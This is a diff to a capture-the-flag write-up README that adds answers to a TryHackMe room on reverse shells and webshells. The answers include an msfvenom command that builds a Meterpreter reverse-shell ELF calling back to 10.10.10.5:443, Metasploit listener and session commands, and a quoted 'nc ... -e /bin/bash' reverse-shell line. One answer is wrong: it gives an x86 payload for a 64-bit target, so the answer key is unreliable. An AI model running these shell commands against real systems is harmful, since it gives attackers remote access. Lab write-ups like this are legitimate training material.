wolketich/THM-Writeup/What-The-Shell?/README.md

 	- `_`

 - What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443?
 The format for the shell is elf and the output filename should be shell
+	- `msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443`

+- What command can be used to start a listener in the background?

+	- `exploit -j`

+- If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

+	- `sessions 10`

+- Read the WebShells information.

+	  no answer needed

+- Read the above information

+	  no answer needed

+- Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash to send a reverse shell back to a waiting listener on your own machine.

+	  no answer needed